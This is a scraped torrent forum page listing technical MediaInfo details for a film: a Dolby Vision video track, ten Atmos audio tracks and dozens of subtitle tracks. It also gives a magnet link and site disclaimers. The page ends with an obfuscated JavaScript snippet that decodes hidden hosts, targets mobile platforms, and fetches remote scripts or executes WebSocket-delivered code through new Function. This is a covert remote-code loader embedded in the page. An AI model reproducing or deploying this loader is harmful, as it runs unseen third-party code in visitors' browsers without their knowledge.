  18. HDR format : Dolby Vision, Version 1.0, dvhe.05.06, BL+RPU

  19. Codec ID : dvhe

  20. Codec ID/Info : High Efficiency Video Coding with Dolby Vision

  21. Duration : 1 h 9 min

  22. Bit rate : 24.5 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 920 pixels

  25. Display aspect ratio : 2.000

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.139

  32. Stream size : 11.9 GiB (76%)

  33. Default : No

  34. Encoded date : UTC 2021-10-04 14:33:26

  35. Tagged date : UTC 2021-10-04 14:41:25

  36. Codec configuration box : hvcC+dvcC


  37. Audio #1

  38. ID : 2

  39. Format : E-AC-3 JOC

  40. Format/Info : Enhanced AC-3 with Joint Object Coding

  41. Commercial name : Dolby Digital Plus with Dolby Atmos

  42. Codec ID : ec-3

  43. Duration : 1 h 9 min

  44. Bit rate mode : Constant

  45. Bit rate : 768 kb/s

  46. Maximum bit rate : 811 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : L R C LFE Ls Rs

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 31.250 FPS (1536 SPF)

  51. Compression mode : Lossy

  52. Stream size : 380 MiB (2%)

  53. Title : English

  54. Language : English

  55. Service kind : Complete Main

  56. Encoded date : UTC 2021-10-04 14:40:11

  57. Tagged date : UTC 2021-10-04 14:41:25

  58. Complexity index : Not present / 16

  59. Number of dynamic objects : 15

  60. Bed channel count : 1 channel

  61. Bed channel configuration : LFE


  62. Audio #2

  63. ID : 3

  64. Format : E-AC-3 JOC

  65. Format/Info : Enhanced AC-3 with Joint Object Coding

  66. Commercial name : Dolby Digital Plus with Dolby Atmos

  67. Codec ID : ec-3

  68. Duration : 1 h 9 min

  69. Bit rate mode : Constant

  70. Bit rate : 768 kb/s

  71. Maximum bit rate : 811 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 380 MiB (2%)

  78. Title : Fran?ais

  79. Language : French

  80. Service kind : Complete Main

  81. Encoded date : UTC 2021-10-04 14:40:19

  82. Tagged date : UTC 2021-10-04 14:41:25

  83. Complexity index : Not present / 16

  84. Number of dynamic objects : 15

  85. Bed channel count : 1 channel

  86. Bed channel configuration : LFE


  87. Audio #3

  88. ID : 4

  89. Format : E-AC-3 JOC

  90. Format/Info : Enhanced AC-3 with Joint Object Coding

  91. Commercial name : Dolby Digital Plus with Dolby Atmos

  92. Codec ID : ec-3

  93. Duration : 1 h 9 min

  94. Bit rate mode : Constant

  95. Bit rate : 768 kb/s

  96. Maximum bit rate : 811 kb/s

  97. Channel(s) : 6 channels

  98. Channel layout : L R C LFE Ls Rs

  99. Sampling rate : 48.0 kHz

  100. Frame rate : 31.250 FPS (1536 SPF)

  101. Compression mode : Lossy

  102. Stream size : 380 MiB (2%)

  103. Title : Fran?ais

  104. Language : French

  105. Service kind : Complete Main

  106. Encoded date : UTC 2021-10-04 14:40:26

  107. Tagged date : UTC 2021-10-04 14:41:25

  108. Complexity index : Not present / 16

  109. Number of dynamic objects : 15

  110. Bed channel count : 1 channel

  111. Bed channel configuration : LFE


  112. Audio #4

  113. ID : 5

  114. Format : E-AC-3 JOC

  115. Format/Info : Enhanced AC-3 with Joint Object Coding

  116. Commercial name : Dolby Digital Plus with Dolby Atmos

  117. Codec ID : ec-3

  118. Duration : 1 h 9 min

  119. Bit rate mode : Constant

  120. Bit rate : 768 kb/s

  121. Maximum bit rate : 811 kb/s

  122. Channel(s) : 6 channels

  123. Channel layout : L R C LFE Ls Rs

  124. Sampling rate : 48.0 kHz

  125. Frame rate : 31.250 FPS (1536 SPF)

  126. Compression mode : Lossy

  127. Stream size : 380 MiB (2%)

  128. Title : Deutsch

  129. Language : German

  130. Service kind : Complete Main

  131. Encoded date : UTC 2021-10-04 14:40:32

  132. Tagged date : UTC 2021-10-04 14:41:25

  133. Complexity index : Not present / 16

  134. Number of dynamic objects : 15

  135. Bed channel count : 1 channel

  136. Bed channel configuration : LFE


  137. Audio #5

  138. ID : 6

  139. Format : E-AC-3 JOC

  140. Format/Info : Enhanced AC-3 with Joint Object Coding

  141. Commercial name : Dolby Digital Plus with Dolby Atmos

  142. Codec ID : ec-3

  143. Duration : 1 h 9 min

  144. Bit rate mode : Constant

  145. Bit rate : 768 kb/s

  146. Maximum bit rate : 811 kb/s

  147. Channel(s) : 6 channels

  148. Channel layout : L R C LFE Ls Rs

  149. Sampling rate : 48.0 kHz

  150. Frame rate : 31.250 FPS (1536 SPF)

  151. Compression mode : Lossy

  152. Stream size : 380 MiB (2%)

  153. Title : Italiano

  154. Language : Italian

  155. Service kind : Complete Main

  156. Encoded date : UTC 2021-10-04 14:40:38

  157. Tagged date : UTC 2021-10-04 14:41:25

  158. Complexity index : Not present / 16

  159. Number of dynamic objects : 15

  160. Bed channel count : 1 channel

  161. Bed channel configuration : LFE


  162. Audio #6

  163. ID : 7

  164. Format : E-AC-3 JOC

  165. Format/Info : Enhanced AC-3 with Joint Object Coding

  166. Commercial name : Dolby Digital Plus with Dolby Atmos

  167. Codec ID : ec-3

  168. Duration : 1 h 9 min

  169. Bit rate mode : Constant

  170. Bit rate : 768 kb/s

  171. Maximum bit rate : 811 kb/s

  172. Channel(s) : 6 channels

  173. Channel layout : L R C LFE Ls Rs

  174. Sampling rate : 48.0 kHz

  175. Frame rate : 31.250 FPS (1536 SPF)

  176. Compression mode : Lossy

  177. Stream size : 380 MiB (2%)

  178. Title : 日本語

  179. Language : Japanese

  180. Service kind : Complete Main

  181. Encoded date : UTC 2021-10-04 14:40:45

  182. Tagged date : UTC 2021-10-04 14:41:25

  183. Complexity index : Not present / 16

  184. Number of dynamic objects : 15

  185. Bed channel count : 1 channel

  186. Bed channel configuration : LFE


  187. Audio #7

  188. ID : 8

  189. Format : E-AC-3 JOC

  190. Format/Info : Enhanced AC-3 with Joint Object Coding

  191. Commercial name : Dolby Digital Plus with Dolby Atmos

  192. Codec ID : ec-3

  193. Duration : 1 h 9 min

  194. Bit rate mode : Constant

  195. Bit rate : 768 kb/s

  196. Maximum bit rate : 811 kb/s

  197. Channel(s) : 6 channels

  198. Channel layout : L R C LFE Ls Rs

  199. Sampling rate : 48.0 kHz

  200. Frame rate : 31.250 FPS (1536 SPF)

  201. Compression mode : Lossy

  202. Stream size : 380 MiB (2%)

  203. Title : Português

  204. Language : Portuguese

  205. Service kind : Complete Main

  206. Encoded date : UTC 2021-10-04 14:40:52

  207. Tagged date : UTC 2021-10-04 14:41:25

  208. Complexity index : Not present / 16

  209. Number of dynamic objects : 15

  210. Bed channel count : 1 channel

  211. Bed channel configuration : LFE


  212. Audio #8

  213. ID : 9

  214. Format : E-AC-3 JOC

  215. Format/Info : Enhanced AC-3 with Joint Object Coding

  216. Commercial name : Dolby Digital Plus with Dolby Atmos

  217. Codec ID : ec-3

  218. Duration : 1 h 9 min

  219. Bit rate mode : Constant

  220. Bit rate : 768 kb/s

  221. Maximum bit rate : 811 kb/s

  222. Channel(s) : 6 channels

  223. Channel layout : L R C LFE Ls Rs

  224. Sampling rate : 48.0 kHz

  225. Frame rate : 31.250 FPS (1536 SPF)

  226. Compression mode : Lossy

  227. Stream size : 380 MiB (2%)

  228. Title : русский язык

  229. Language : Russian

  230. Service kind : Complete Main

  231. Encoded date : UTC 2021-10-04 14:40:58

  232. Tagged date : UTC 2021-10-04 14:41:25

  233. Complexity index : Not present / 16

  234. Number of dynamic objects : 15

  235. Bed channel count : 1 channel

  236. Bed channel configuration : LFE


  237. Audio #9

  238. ID : 10

  239. Format : E-AC-3 JOC

  240. Format/Info : Enhanced AC-3 with Joint Object Coding

  241. Commercial name : Dolby Digital Plus with Dolby Atmos

  242. Codec ID : ec-3

  243. Duration : 1 h 9 min

  244. Bit rate mode : Constant

  245. Bit rate : 768 kb/s

  246. Maximum bit rate : 811 kb/s

  247. Channel(s) : 6 channels

  248. Channel layout : L R C LFE Ls Rs

  249. Sampling rate : 48.0 kHz

  250. Frame rate : 31.250 FPS (1536 SPF)

  251. Compression mode : Lossy

  252. Stream size : 380 MiB (2%)

  253. Title : Espa?ol?(Latinoamérica)

  254. Language : Spanish

  255. Service kind : Complete Main

  256. Encoded date : UTC 2021-10-04 14:41:04

  257. Tagged date : UTC 2021-10-04 14:41:25

  258. Complexity index : Not present / 16

  259. Number of dynamic objects : 15

  260. Bed channel count : 1 channel

  261. Bed channel configuration : LFE


  262. Audio #10

  263. ID : 11

  264. Format : E-AC-3 JOC

  265. Format/Info : Enhanced AC-3 with Joint Object Coding

  266. Commercial name : Dolby Digital Plus with Dolby Atmos

  267. Codec ID : ec-3

  268. Duration : 1 h 9 min

  269. Bit rate mode : Constant

  270. Bit rate : 768 kb/s

  271. Maximum bit rate : 811 kb/s

  272. Channel(s) : 6 channels

  273. Channel layout : L R C LFE Ls Rs

  274. Sampling rate : 48.0 kHz

  275. Frame rate : 31.250 FPS (1536 SPF)

  276. Compression mode : Lossy

  277. Stream size : 380 MiB (2%)

  278. Title : Espa?ol?(Espa?a)

  279. Language : Spanish

  280. Service kind : Complete Main

  281. Encoded date : UTC 2021-10-04 14:41:11

  282. Tagged date : UTC 2021-10-04 14:41:25

  283. Complexity index : Not present / 16

  284. Number of dynamic objects : 15

  285. Bed channel count : 1 channel

  286. Bed channel configuration : LFE


  287. Text #1

  288. ID : 12

  289. Format : Timed Text

  290. Codec ID : tx3g

  291. Duration : 1 h 7 min

  292. Bit rate mode : Variable

  293. Bit rate : 66 b/s

  294. Stream size : 33.0 KiB (0%)

  295. Title : English

  296. Language : English

  297. Forced : No

  298. Encoded date : UTC 2021-10-04 14:41:18

  299. Tagged date : UTC 2021-10-04 14:41:25


  300. Text #2

  301. ID : 13

  302. Format : Timed Text

  303. Codec ID : tx3g

  304. Duration : 1 h 9 min

  305. Bit rate mode : Variable

  306. Bit rate : 93 b/s

  307. Stream size : 46.9 KiB (0%)

  308. Title : ????

  309. Language : Arabic

  310. Forced : No

  311. Encoded date : UTC 2021-10-04 14:41:19

  312. Tagged date : UTC 2021-10-04 14:41:25


  313. Text #3

  314. ID : 14

  315. Format : Timed Text

  316. Codec ID : tx3g

  317. Duration : 1 h 9 min

  318. Bit rate mode : Variable

  319. Bit rate : 99 b/s

  320. Stream size : 50.0 KiB (0%)

  321. Title : български

  322. Language : Bulgarian

  323. Forced : No

  324. Encoded date : UTC 2021-10-04 14:41:19

  325. Tagged date : UTC 2021-10-04 14:41:25


  326. Text #4

  327. ID : 15

  328. Format : Timed Text

  329. Codec ID : tx3g

  330. Duration : 1 h 9 min

  331. Bit rate mode : Variable

  332. Bit rate : 65 b/s

  333. Stream size : 33.0 KiB (0%)

  334. Title : ?esky

  335. Language : Czech

  336. Forced : No

  337. Encoded date : UTC 2021-10-04 14:41:19

  338. Tagged date : UTC 2021-10-04 14:41:25


  339. Text #5

  340. ID : 16

  341. Format : Timed Text

  342. Codec ID : tx3g

  343. Duration : 1 h 9 min

  344. Bit rate mode : Variable

  345. Bit rate : 67 b/s

  346. Stream size : 34.2 KiB (0%)

  347. Title : dansk

  348. Language : Danish

  349. Forced : No

  350. Encoded date : UTC 2021-10-04 14:41:19

  351. Tagged date : UTC 2021-10-04 14:41:25


  352. Text #6

  353. ID : 17

  354. Format : Timed Text

  355. Codec ID : tx3g

  356. Duration : 1 h 9 min

  357. Bit rate mode : Variable

  358. Bit rate : 61 b/s

  359. Stream size : 31.0 KiB (0%)

  360. Title : Nederlands

  361. Language : Dutch

  362. Forced : No

  363. Encoded date : UTC 2021-10-04 14:41:19

  364. Tagged date : UTC 2021-10-04 14:41:25


  365. Text #7

  366. ID : 18

  367. Format : Timed Text

  368. Codec ID : tx3g

  369. Duration : 1 h 9 min

  370. Bit rate mode : Variable

  371. Bit rate : 63 b/s

  372. Stream size : 31.8 KiB (0%)

  373. Title : eesti keel

  374. Language : Estonian

  375. Forced : No

  376. Encoded date : UTC 2021-10-04 14:41:19

  377. Tagged date : UTC 2021-10-04 14:41:25


  378. Text #8

  379. ID : 19

  380. Format : Timed Text

  381. Codec ID : tx3g

  382. Duration : 1 h 9 min

  383. Bit rate mode : Variable

  384. Bit rate : 66 b/s

  385. Stream size : 33.5 KiB (0%)

  386. Title : Vlaams

  387. Language : Finnish

  388. Forced : No

  389. Encoded date : UTC 2021-10-04 14:41:19

  390. Tagged date : UTC 2021-10-04 14:41:25


  391. Text #9

  392. ID : 20

  393. Format : Timed Text

  394. Codec ID : tx3g

  395. Duration : 1 h 9 min

  396. Bit rate mode : Variable

  397. Bit rate : 67 b/s

  398. Stream size : 33.7 KiB (0%)

  399. Title : Fran?ais

  400. Language : French

  401. Forced : No

  402. Encoded date : UTC 2021-10-04 14:41:20

  403. Tagged date : UTC 2021-10-04 14:41:25


  404. Text #10

  405. ID : 21

  406. Format : Timed Text

  407. Codec ID : tx3g

  408. Duration : 1 h 9 min

  409. Bit rate mode : Variable

  410. Bit rate : 67 b/s

  411. Stream size : 33.8 KiB (0%)

  412. Title : Fran?ais

  413. Language : French

  414. Forced : No

  415. Encoded date : UTC 2021-10-04 14:41:20

  416. Tagged date : UTC 2021-10-04 14:41:25


  417. Text #11

  418. ID : 22

  419. Format : Timed Text

  420. Codec ID : tx3g

  421. Duration : 1 h 9 min

  422. Bit rate mode : Variable

  423. Bit rate : 67 b/s

  424. Stream size : 33.8 KiB (0%)

  425. Title : Fran?ais

  426. Language : French

  427. Forced : No

  428. Encoded date : UTC 2021-10-04 14:41:20

  429. Tagged date : UTC 2021-10-04 14:41:25


  430. Text #12

  431. ID : 23

  432. Format : Timed Text

  433. Codec ID : tx3g

  434. Duration : 1 h 9 min

  435. Bit rate mode : Variable

  436. Bit rate : 70 b/s

  437. Stream size : 35.5 KiB (0%)

  438. Title : Deutsch

  439. Language : German

  440. Forced : No

  441. Encoded date : UTC 2021-10-04 14:41:20

  442. Tagged date : UTC 2021-10-04 14:41:25


  443. Text #13

  444. ID : 24

  445. Format : Timed Text

  446. Codec ID : tx3g

  447. Duration : 1 h 9 min

  448. Bit rate mode : Variable

  449. Bit rate : 111 b/s

  450. Stream size : 56.5 KiB (0%)

  451. Title : ελληνικ?

  452. Language : Greek

  453. Forced : No

  454. Encoded date : UTC 2021-10-04 14:41:20

  455. Tagged date : UTC 2021-10-04 14:41:25


  456. Text #14

  457. ID : 25

  458. Format : Timed Text

  459. Codec ID : tx3g

  460. Duration : 1 h 9 min

  461. Bit rate mode : Variable

  462. Bit rate : 84 b/s

  463. Stream size : 42.7 KiB (0%)

  464. Title : ????

  465. Language : Hebrew

  466. Forced : No

  467. Encoded date : UTC 2021-10-04 14:41:20

  468. Tagged date : UTC 2021-10-04 14:41:25


  469. Text #15

  470. ID : 26

  471. Format : Timed Text

  472. Codec ID : tx3g

  473. Duration : 1 h 9 min

  474. Bit rate mode : Variable

  475. Bit rate : 167 b/s

  476. Stream size : 84.5 KiB (0%)

  477. Title : ??????

  478. Language : Hindi

  479. Forced : No

  480. Encoded date : UTC 2021-10-04 14:41:21

  481. Tagged date : UTC 2021-10-04 14:41:25


  482. Text #16

  483. ID : 27

  484. Format : Timed Text

  485. Codec ID : tx3g

  486. Duration : 1 h 9 min

  487. Bit rate mode : Variable

  488. Bit rate : 66 b/s

  489. Stream size : 33.5 KiB (0%)

  490. Title : Magyar

  491. Language : Hungarian

  492. Forced : No

  493. Encoded date : UTC 2021-10-04 14:41:21

  494. Tagged date : UTC 2021-10-04 14:41:25


  495. Text #17

  496. ID : 28

  497. Format : Timed Text

  498. Codec ID : tx3g

  499. Duration : 1 h 9 min

  500. Bit rate mode : Variable

  501. Bit rate : 71 b/s

  502. Stream size : 36.1 KiB (0%)

  503. Title : Indonesia

  504. Language : Indonesian

  505. Forced : No

  506. Encoded date : UTC 2021-10-04 14:41:21

  507. Tagged date : UTC 2021-10-04 14:41:25


  508. Text #18

  509. ID : 29

  510. Format : Timed Text

  511. Codec ID : tx3g

  512. Duration : 1 h 9 min

  513. Bit rate mode : Variable

  514. Bit rate : 69 b/s

  515. Stream size : 35.2 KiB (0%)

  516. Title : Italiano

  517. Language : Italian

  518. Forced : No

  519. Encoded date : UTC 2021-10-04 14:41:21

  520. Tagged date : UTC 2021-10-04 14:41:25


  521. Text #19

  522. ID : 30

  523. Format : Timed Text

  524. Codec ID : tx3g

  525. Duration : 1 h 9 min

  526. Bit rate mode : Variable

  527. Bit rate : 59 b/s

  528. Stream size : 29.7 KiB (0%)

  529. Title : 日本語

  530. Language : Japanese

  531. Forced : No

  532. Encoded date : UTC 2021-10-04 14:41:21

  533. Tagged date : UTC 2021-10-04 14:41:25


  534. Text #20

  535. ID : 31

  536. Format : Timed Text

  537. Codec ID : tx3g

  538. Duration : 1 h 9 min

  539. Bit rate mode : Variable

  540. Bit rate : 67 b/s

  541. Stream size : 34.2 KiB (0%)

  542. Title : ???

  543. Language : Korean

  544. Forced : No

  545. Encoded date : UTC 2021-10-04 14:41:21

  546. Tagged date : UTC 2021-10-04 14:41:25


  547. Text #21

  548. ID : 32

  549. Format : Timed Text

  550. Codec ID : tx3g

  551. Duration : 1 h 9 min

  552. Bit rate mode : Variable

  553. Bit rate : 67 b/s

  554. Stream size : 34.1 KiB (0%)

  555. Title : lietuvi? kalba

  556. Language : Lithuanian

  557. Forced : No

  558. Encoded date : UTC 2021-10-04 14:41:21

  559. Tagged date : UTC 2021-10-04 14:41:25


  560. Text #22

  561. ID : 33

  562. Format : Timed Text

  563. Codec ID : tx3g

  564. Duration : 1 h 9 min

  565. Bit rate mode : Variable

  566. Bit rate : 69 b/s

  567. Stream size : 35.0 KiB (0%)

  568. Title : latvie?u valoda

  569. Language : Latvian

  570. Forced : No

  571. Encoded date : UTC 2021-10-04 14:41:22

  572. Tagged date : UTC 2021-10-04 14:41:25


  573. Text #23

  574. ID : 34

  575. Format : Timed Text

  576. Codec ID : tx3g

  577. Duration : 1 h 9 min

  578. Bit rate mode : Variable

  579. Bit rate : 67 b/s

  580. Stream size : 34.0 KiB (0%)

  581. Title : ???? ?????

  582. Language : Malay

  583. Forced : No

  584. Encoded date : UTC 2021-10-04 14:41:22

  585. Tagged date : UTC 2021-10-04 14:41:25


  586. Text #24

  587. ID : 35

  588. Format : Timed Text

  589. Codec ID : tx3g

  590. Duration : 1 h 9 min

  591. Bit rate mode : Variable

  592. Bit rate : 58 b/s

  593. Stream size : 29.2 KiB (0%)

  594. Title : 中文(简体)

  595. Language : Chinese

  596. Forced : No

  597. Encoded date : UTC 2021-10-04 14:41:22

  598. Tagged date : UTC 2021-10-04 14:41:25


  599. Text #25

  600. ID : 36

  601. Format : Timed Text

  602. Codec ID : tx3g

  603. Duration : 1 h 9 min

  604. Bit rate mode : Variable

  605. Bit rate : 58 b/s

  606. Stream size : 29.3 KiB (0%)

  607. Title : 中文(繁體)

  608. Language : Chinese

  609. Forced : No

  610. Encoded date : UTC 2021-10-04 14:41:22

  611. Tagged date : UTC 2021-10-04 14:41:25


  612. Text #26

  613. ID : 37

  614. Format : Timed Text

  615. Codec ID : tx3g

  616. Duration : 1 h 9 min

  617. Bit rate mode : Variable

  618. Bit rate : 58 b/s

  619. Stream size : 29.6 KiB (0%)

  620. Title : 中文(粤语)

  621. Language : Chinese

  622. Forced : No

  623. Encoded date : UTC 2021-10-04 14:41:22

  624. Tagged date : UTC 2021-10-04 14:41:25


  625. Text #27

  626. ID : 38

  627. Format : Timed Text

  628. Codec ID : tx3g

  629. Duration : 1 h 9 min

  630. Bit rate mode : Variable

  631. Bit rate : 65 b/s

  632. Stream size : 32.8 KiB (0%)

  633. Title : norsk

  634. Language : Norwegian

  635. Forced : No

  636. Encoded date : UTC 2021-10-04 14:41:22

  637. Tagged date : UTC 2021-10-04 14:41:25


  638. Text #28

  639. ID : 39

  640. Format : Timed Text

  641. Codec ID : tx3g

  642. Duration : 1 h 9 min

  643. Bit rate mode : Variable

  644. Bit rate : 65 b/s

  645. Stream size : 33.0 KiB (0%)

  646. Title : J?zyk polski

  647. Language : Polish

  648. Forced : No

  649. Encoded date : UTC 2021-10-04 14:41:23

  650. Tagged date : UTC 2021-10-04 14:41:25


  651. Text #29

  652. ID : 40

  653. Format : Timed Text

  654. Codec ID : tx3g

  655. Duration : 1 h 9 min

  656. Bit rate mode : Variable

  657. Bit rate : 67 b/s

  658. Stream size : 33.8 KiB (0%)

  659. Title : Português

  660. Language : Portuguese

  661. Forced : No

  662. Encoded date : UTC 2021-10-04 14:41:23

  663. Tagged date : UTC 2021-10-04 14:41:25


  664. Text #30

  665. ID : 41

  666. Format : Timed Text

  667. Codec ID : tx3g

  668. Duration : 1 h 9 min

  669. Bit rate mode : Variable

  670. Bit rate : 65 b/s

  671. Stream size : 32.8 KiB (0%)

  672. Title : Português

  673. Language : Portuguese

  674. Forced : No

  675. Encoded date : UTC 2021-10-04 14:41:23

  676. Tagged date : UTC 2021-10-04 14:41:25


  677. Text #31

  678. ID : 42

  679. Format : Timed Text

  680. Codec ID : tx3g

  681. Duration : 1 h 8 min

  682. Bit rate mode : Variable

  683. Bit rate : 101 b/s

  684. Stream size : 50.3 KiB (0%)

  685. Title : русский язык

  686. Language : Russian

  687. Forced : No

  688. Encoded date : UTC 2021-10-04 14:41:23

  689. Tagged date : UTC 2021-10-04 14:41:25


  690. Text #32

  691. ID : 43

  692. Format : Timed Text

  693. Codec ID : tx3g

  694. Duration : 1 h 9 min

  695. Bit rate mode : Variable

  696. Bit rate : 63 b/s

  697. Stream size : 32.1 KiB (0%)

  698. Title : sloven?ina

  699. Language : Slovak

  700. Forced : No

  701. Encoded date : UTC 2021-10-04 14:41:23

  702. Tagged date : UTC 2021-10-04 14:41:25


  703. Text #33

  704. ID : 44

  705. Format : Timed Text

  706. Codec ID : tx3g

  707. Duration : 1 h 9 min

  708. Bit rate mode : Variable

  709. Bit rate : 59 b/s

  710. Stream size : 29.9 KiB (0%)

  711. Title : sloven??ina

  712. Language : Slovenian

  713. Forced : No

  714. Encoded date : UTC 2021-10-04 14:41:23

  715. Tagged date : UTC 2021-10-04 14:41:25


  716. Text #34

  717. ID : 45

  718. Format : Timed Text

  719. Codec ID : tx3g

  720. Duration : 1 h 9 min

  721. Bit rate mode : Variable

  722. Bit rate : 68 b/s

  723. Stream size : 34.7 KiB (0%)

  724. Title : Espa?ol?(Latinoamérica)

  725. Language : Spanish

  726. Forced : No

  727. Encoded date : UTC 2021-10-04 14:41:23

  728. Tagged date : UTC 2021-10-04 14:41:25


  729. Text #35

  730. ID : 46

  731. Format : Timed Text

  732. Codec ID : tx3g

  733. Duration : 1 h 9 min

  734. Bit rate mode : Variable

  735. Bit rate : 67 b/s

  736. Stream size : 33.9 KiB (0%)

  737. Title : Espa?ol?(Espa?a)

  738. Language : Spanish

  739. Forced : No

  740. Encoded date : UTC 2021-10-04 14:41:24

  741. Tagged date : UTC 2021-10-04 14:41:25


  742. Text #36

  743. ID : 47

  744. Format : Timed Text

  745. Codec ID : tx3g

  746. Duration : 1 h 9 min

  747. Bit rate mode : Variable

  748. Bit rate : 67 b/s

  749. Stream size : 33.9 KiB (0%)

  750. Title : svenska

  751. Language : Swedish

  752. Forced : No

  753. Encoded date : UTC 2021-10-04 14:41:24

  754. Tagged date : UTC 2021-10-04 14:41:25


  755. Text #37

  756. ID : 48

  757. Format : Timed Text

  758. Codec ID : tx3g

  759. Duration : 1 h 9 min

  760. Bit rate mode : Variable

  761. Bit rate : 192 b/s

  762. Stream size : 97.5 KiB (0%)

  763. Title : ?????

  764. Language : Tamil

  765. Forced : No

  766. Encoded date : UTC 2021-10-04 14:41:24

  767. Tagged date : UTC 2021-10-04 14:41:25


  768. Text #38

  769. ID : 49

  770. Format : Timed Text

  771. Codec ID : tx3g

  772. Duration : 1 h 9 min

  773. Bit rate mode : Variable

  774. Bit rate : 178 b/s

  775. Stream size : 90.3 KiB (0%)

  776. Title : ??????

  777. Language : Telugu

  778. Forced : No

  779. Encoded date : UTC 2021-10-04 14:41:24

  780. Tagged date : UTC 2021-10-04 14:41:25


  781. Text #39

  782. ID : 50

  783. Format : Timed Text

  784. Codec ID : tx3g

  785. Duration : 1 h 9 min

  786. Bit rate mode : Variable

  787. Bit rate : 162 b/s

  788. Stream size : 81.9 KiB (0%)

  789. Title : ???

  790. Language : Thai

  791. Forced : No

  792. Encoded date : UTC 2021-10-04 14:41:24

  793. Tagged date : UTC 2021-10-04 14:41:25


  794. Text #40

  795. ID : 51

  796. Format : Timed Text

  797. Codec ID : tx3g

  798. Duration : 1 h 9 min

  799. Bit rate mode : Variable

  800. Bit rate : 69 b/s

  801. Stream size : 34.9 KiB (0%)

  802. Title : Türk

  803. Language : Turkish

  804. Forced : No

  805. Encoded date : UTC 2021-10-04 14:41:24

  806. Tagged date : UTC 2021-10-04 14:41:25


  807. Text #41

  808. ID : 52

  809. Format : Timed Text

  810. Codec ID : tx3g

  811. Duration : 1 h 9 min

  812. Bit rate mode : Variable

  813. Bit rate : 102 b/s

  814. Stream size : 51.7 KiB (0%)

  815. Title : Укра?нська

  816. Language : Ukrainian

  817. Forced : No

  818. Encoded date : UTC 2021-10-04 14:41:25

  819. Tagged date : UTC 2021-10-04 14:41:25


  820. Text #42

  821. ID : 53

  822. Format : Timed Text

  823. Codec ID : tx3g

  824. Duration : 1 h 9 min

  825. Bit rate mode : Variable

  826. Bit rate : 89 b/s

  827. Stream size : 44.9 KiB (0%)

  828. Title : Ti?ng Vi?t

  829. Language : Vietnamese

  830. Forced : No

  831. Encoded date : UTC 2021-10-04 14:41:25

  832. Tagged date : UTC 2021-10-04 14:41:25




复制代码


TAGS 科幻

磁力链:
  • magnet:?xt=urn:btih:81E1D952FE398FD3516106BFA37E8AB5FB6A8F66

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};